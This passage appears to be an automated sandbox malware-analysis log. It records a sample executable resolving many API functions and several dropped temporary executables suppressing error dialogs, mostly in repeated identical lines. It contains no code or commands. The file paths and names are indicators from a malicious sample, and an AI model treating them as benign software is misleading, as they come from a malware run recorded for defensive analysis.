                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\zLwT7vCojz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u48o.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess information set: NOOPENFILEERRORBOX
